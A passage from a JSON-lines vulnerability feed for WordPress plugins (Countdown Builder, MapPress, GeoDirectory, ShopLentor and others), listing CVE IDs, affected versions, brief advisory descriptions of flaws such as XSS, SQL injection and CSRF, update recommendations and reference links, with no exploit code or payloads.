version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/ab05bc570a8ba6449cd470791be1c0670eb9c203\\\/includes\\\/core\\\/class-files.php#L332\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/ab05bc570a8ba6449cd470791be1c0670eb9c203\\\/includes\\\/core\\\/class-files.php#L332\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/ab05bc570a8ba6449cd470791be1c0670eb9c203\\\/includes\\\/core\\\/class-files.php#L371\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/ab05bc570a8ba6449cd470791be1c0670eb9c203\\\/includes\\\/core\\\/class-files.php#L371\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186722%40ultimate-member&new=3186722%40ultimate-member&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186722%40ultimate-member&new=3186722%40ultimate-member&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a9793b6-2186-46ef-b204-d8f8f154ebf3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a9793b6-2186-46ef-b204-d8f8f154ebf3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2270","slug":"countdown-builder","versionImpact":"2.8.9.1","versionEndExcluding":"2.9.0","description":"The Countdown, Coming Soon, Maintenance \u2013 Countdown & Clock plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.8.9.1 via the createCdObj function. This makes it possible for unauthenticated attackers to include and execute files with the specific filenames on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in some cases.","recommendation":"Update to version 2.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/countdown-builder\\\/trunk\\\/classes\\\/RegisterPostType.php#L116\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/countdown-builder\\\/trunk\\\/classes\\\/RegisterPostType.php#L116\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2260d6b-1a41-4757-a063-8b8857ef416a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2260d6b-1a41-4757-a063-8b8857ef416a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13316","slug":"scratch-win-giveaways-for-website-facebook","versionImpact":"2.8.0","versionEndExcluding":"2.9.0","description":"The Scratch & Win \u2013 Giveaways and Contests. Boost subscribers, traffic, repeat visits,  referrals, sales and more plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the apmswn_create_discount() function in all versions up to, and including, 2.8.0. This makes it possible for unauthenticated attackers to create coupons.","recommendation":"Update to version 2.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scratch-win-giveaways-for-website-facebook\\\/tags\\\/2.7.0\\\/socialscratchwin.php#L492\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scratch-win-giveaways-for-website-facebook\\\/tags\\\/2.7.0\\\/socialscratchwin.php#L492\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212730%40scratch-win-giveaways-for-website-facebook&new=3212730%40scratch-win-giveaways-for-website-facebook&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212730%40scratch-win-giveaways-for-website-facebook&new=3212730%40scratch-win-giveaways-for-website-facebook&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3239997%40scratch-win-giveaways-for-website-facebook&new=3239997%40scratch-win-giveaways-for-website-facebook&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3239997%40scratch-win-giveaways-for-website-facebook&new=3239997%40scratch-win-giveaways-for-website-facebook&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95103830-9009-48df-ab15-476402b59e3f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95103830-9009-48df-ab15-476402b59e3f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1232","slug":"cm-download-manager","versionEndExcluding":"2.9.0","description":"The CM Download Manager  WordPress plugin before 2.9.0 does not have CSRF checks in some places, which could allow attackers to make logged in admins delete downloads via a CSRF attack","recommendation":"Update to version 2.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a29b509-4cd5-43c8-84f4-f86251dd28f8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a29b509-4cd5-43c8-84f4-f86251dd28f8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1231","slug":"cm-download-manager","versionEndExcluding":"2.9.0","description":"The CM Download Manager  WordPress plugin before 2.9.0 does not have CSRF checks in some places, which could allow attackers to make logged in admins unpublish downloads via a CSRF attack","recommendation":"Update to version 2.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d3968d9-61ed-4c00-8764-0360cf03255e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d3968d9-61ed-4c00-8764-0360cf03255e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7258","slug":"wp-product-feed-manager","versionImpact":"2.8.0","versionEndExcluding":"2.9.0","description":"The WooCommerce Google Feed Manager plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'wppfm_removeFeedFile' function in all versions up to, and including, 2.8.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 2.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffd6e18d-9173-4911-af64-5d54c6d2e052?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffd6e18d-9173-4911-af64-5d54c6d2e052?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-product-feed-manager\\\/trunk\\\/includes\\\/data\\\/js\\\/wppfm_ajaxdatahandling.js#L537\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-product-feed-manager\\\/trunk\\\/includes\\\/data\\\/js\\\/wppfm_ajaxdatahandling.js#L537\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-product-feed-manager\\\/trunk\\\/includes\\\/data\\\/js\\\/wppfm_ajaxdatahandling.js#L546\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-product-feed-manager\\\/trunk\\\/includes\\\/data\\\/js\\\/wppfm_ajaxdatahandling.js#L546\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-product-feed-manager\\\/trunk\\\/includes\\\/data\\\/js\\\/wppfm_ajaxdatahandling.js#L575\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-product-feed-manager\\\/trunk\\\/includes\\\/data\\\/js\\\/wppfm_ajaxdatahandling.js#L575\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137475\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137475\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-2440","slug":"theme-editor","versionImpact":"2.8","versionEndExcluding":"2.9","description":"The Theme Editor plugin for WordPress is vulnerable to deserialization of untrusted input via the 'images_array' parameter in versions up to, and including 2.8. This makes it possible for authenticated attackers with administrative privileges to call files using a PHAR wrapper that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present. It also requires that the attacker is successful in uploading a file with the serialized payload.","recommendation":"Update to version 2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88fe46bf-8e85-4550-92ad-bdd426e5a745?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88fe46bf-8e85-4550-92ad-bdd426e5a745?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theme-editor\\\/trunk\\\/ms_child_theme_editor.php#L495\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theme-editor\\\/trunk\\\/ms_child_theme_editor.php#L495\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142694\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142694\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12322","slug":"theperfectweddingnl-widget","versionImpact":"2.8","versionEndExcluding":"2.9","description":"The ThePerfectWedding.nl Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8. This is due to missing or incorrect nonce validation on the 'update_option' function. This makes it possible for unauthenticated attackers to update the 'tpwKey' option with stored cross-site scripting via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theperfectweddingnl-widget\\\/trunk\\\/admin\\\/tpwAdminPanelTemplate.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theperfectweddingnl-widget\\\/trunk\\\/admin\\\/tpwAdminPanelTemplate.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theperfectweddingnl-widget\\\/trunk\\\/admin\\\/tpwAdminPanelTemplate.php#L4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theperfectweddingnl-widget\\\/trunk\\\/admin\\\/tpwAdminPanelTemplate.php#L4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theperfectweddingnl-widget\\\/trunk\\\/admin\\\/tpwAdminPanelTemplate.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theperfectweddingnl-widget\\\/trunk\\\/admin\\\/tpwAdminPanelTemplate.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theperfectweddingnl-widget\\\/trunk\\\/admin\\\/tpwAdminPanelTemplate.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theperfectweddingnl-widget\\\/trunk\\\/admin\\\/tpwAdminPanelTemplate.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e996f71a-f0b9-4e10-873e-a0299a099dce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e996f71a-f0b9-4e10-873e-a0299a099dce?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9696","slug":"rescue-shortcodes","versionImpact":"2.8","versionEndExcluding":"2.9","description":"The Rescue Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'rescue_tab' shortcode in all versions up to, and including, 2.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9517db1f-1704-4f25-9b02-795da3c4c067?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9517db1f-1704-4f25-9b02-795da3c4c067?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3167329%40rescue-shortcodes&new=3167329%40rescue-shortcodes&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3167329%40rescue-shortcodes&new=3167329%40rescue-shortcodes&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9891","slug":"multiline-files-for-contact-form-7","versionImpact":"2.8.1","versionEndExcluding":"2.9","description":"The Multiline files upload for contact form 7 plugin for WordPress is vulnerable to unauthorized plugin deactivation due to a missing capability check on the mfcf7_zl_custom_handle_deactivation_plugin_form_submission() function in all versions up to, and including, 2.8.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to deactivate the plugin and send a custom reason from the site.","recommendation":"Update to version 2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cf62f45-a142-497e-9838-ce0b1b1bb3d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cf62f45-a142-497e-9838-ce0b1b1bb3d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/tags\\\/2.8.1\\\/multiline-files-for-contact-form-7\\\/multiline-admin.php#L410\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/tags\\\/2.8.1\\\/multiline-files-for-contact-form-7\\\/multiline-admin.php#L410\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169228\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169228\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5560","slug":"wp-useronline","versionImpact":"2.88.2","versionEndExcluding":"2.88.3","description":"The WP-UserOnline WordPress plugin before 2.88.3 does not sanitise and escape the X-Forwarded-For header before outputting its content on the page, which allows unauthenticated users to perform Cross-Site Scripting attacks.","recommendation":"Update to version 2.88.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/55d23184-fc5a-4090-b079-142407b59b05\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/55d23184-fc5a-4090-b079-142407b59b05\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7225","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.88.16","versionEndExcluding":"2.88.17","description":"The MapPress Maps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the width and height parameters in all versions up to, and including, 2.88.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.88.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fce76126-0cfd-464f-b644-45d4301e958d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fce76126-0cfd-464f-b644-45d4301e958d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3023266%40mappress-google-maps-for-wordpress%2Ftrunk&old=3022439%40mappress-google-maps-for-wordpress%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3023266%40mappress-google-maps-for-wordpress%2Ftrunk&old=3022439%40mappress-google-maps-for-wordpress%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2023-7225\\\/\",\"name\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2023-7225\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0421","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.88.15","versionEndExcluding":"2.88.16","description":"The MapPress Maps for WordPress plugin before 2.88.16 does not ensure that posts to be retrieve via an AJAX action is a public map, allowing unauthenticated users to read arbitrary private and draft posts.","recommendation":"Update to version 2.88.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/587acc47-1966-4baf-a380-6aa479a97c82\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/587acc47-1966-4baf-a380-6aa479a97c82\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0420","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.88.14","versionEndExcluding":"2.88.15","description":"The MapPress Maps for WordPress plugin before 2.88.15 does not sanitize and escape the map title when outputting it back in the admin dashboard, allowing Contributors and above roles to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 2.88.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6187ef8-70f4-4911-abd7-42bf6b7e54b7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6187ef8-70f4-4911-abd7-42bf6b7e54b7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6524","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.88.13","versionEndExcluding":"2.88.14","description":"The MapPress Maps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the map title parameter in all versions up to and including 2.88.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.88.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28a8f025-c2ab-4a5f-a99e-a2d19b14a190?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28a8f025-c2ab-4a5f-a99e-a2d19b14a190?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3001436%40mappress-google-maps-for-wordpress%2Ftags%2F2.88.13&new=3015598%40mappress-google-maps-for-wordpress%2Ftags%2F2.88.14#file31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3001436%40mappress-google-maps-for-wordpress%2Ftags%2F2.88.13&new=3015598%40mappress-google-maps-for-wordpress%2Ftags%2F2.88.14#file31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2023-6524\",\"name\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2023-6524\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-26015","slug":"mappress-google-maps-for-wordpress","versionEndExcluding":"2.85.5","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Chris Richardson MapPress Maps for WordPress mappress-google-maps-for-wordpress allows SQL Injection.This issue affects MapPress Maps for WordPress: from n\/a through 2.85.4.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/mappress-google-maps-for-wordpress\\\/wordpress-mappress-maps-for-wordpress-plugin-2-85-4-authenticated-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/mappress-google-maps-for-wordpress\\\/wordpress-mappress-maps-for-wordpress-plugin-2-85-4-authenticated-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13507","slug":"geodirectory","versionImpact":"2.8.97","versionEndExcluding":"2.8.98","description":"The GeoDirectory \u2013 WP Business Directory Plugin and Classified Listings Directory plugin for WordPress is vulnerable to time-based SQL Injection via the dist parameter in all versions up to, and including, 2.8.97 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.8.98, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geodirectory\\\/tags\\\/2.8.97\\\/includes\\\/class-geodir-query.php#L733\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geodirectory\\\/tags\\\/2.8.97\\\/includes\\\/class-geodir-query.php#L733\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3225839%40geodirectory%2Ftrunk&old=3223673%40geodirectory%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3225839%40geodirectory%2Ftrunk&old=3223673%40geodirectory%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30a15a22-d6f3-4829-995d-7fa14d1db7a9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30a15a22-d6f3-4829-995d-7fa14d1db7a9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13506","slug":"geodirectory","versionImpact":"2.8.97","versionEndExcluding":"2.8.98","description":"The GeoDirectory \u2013 WP Business Directory Plugin and Classified Listings Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the display_name profile parameter in all versions up to, and including, 2.8.97 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.98, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geodirectory\\\/tags\\\/2.8.97\\\/includes\\\/admin\\\/class-geodir-admin-post-view.php#L317\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geodirectory\\\/tags\\\/2.8.97\\\/includes\\\/admin\\\/class-geodir-admin-post-view.php#L317\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225839\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225839\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0d9ba14-c0c9-426e-927e-9139a0882f0d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0d9ba14-c0c9-426e-927e-9139a0882f0d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13606","slug":"js-support-ticket","versionImpact":"2.8.8","versionEndExcluding":"2.8.9","description":"The JS Help Desk \u2013 The Ultimate Help Desk & Support Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.8.8 via the 'jssupportticketdata' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads\/jssupportticketdata directory which can contain file attachments included in support tickets.","recommendation":"Update to version 2.8.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.8\\\/includes\\\/classes\\\/uploads.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.8\\\/includes\\\/classes\\\/uploads.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8ed5d5d-86b0-40ac-a093-31392dea13a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8ed5d5d-86b0-40ac-a093-31392dea13a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4566","slug":"woolentor-addons","versionImpact":"2.8.8","versionEndExcluding":"2.8.9","description":"The ShopLentor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_dismiss function in all versions up to, and including, 2.8.8. This makes it possible for authenticated attackers, with contributor-level access and above, to set arbitrary WordPress options to \"true\". NOTE: This vulnerability can be exploited by attackers with subscriber- or customer-level access and above if (1) the WooCommerce plugin is deactivated or (2) access to the default WordPress admin dashboard is explicitly enabled for authenticated users.","recommendation":"Update to version 2.8.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6aaabe9-4f55-4c01-b350-573e6a944353?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6aaabe9-4f55-4c01-b350-573e6a944353?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/trunk\\\/includes\\\/admin\\\/include\\\/class.notice.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/trunk\\\/includes\\\/admin\\\/include\\\/class.notice.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088881\\\/woolentor-addons\\\/trunk\\\/includes\\\/admin\\\/include\\\/class.notice.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088881\\\/woolentor-addons\\\/trunk\\\/includes\\\/admin\\\/include\\\/class.notice.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3345","slug":"woolentor-addons","versionImpact":"2.8.8","versionEndExcluding":"2.8.9","description":"The ShopLentor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's woolentorsearch shortcode in all versions up to, and including, 2.8.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.9, or a newer patched 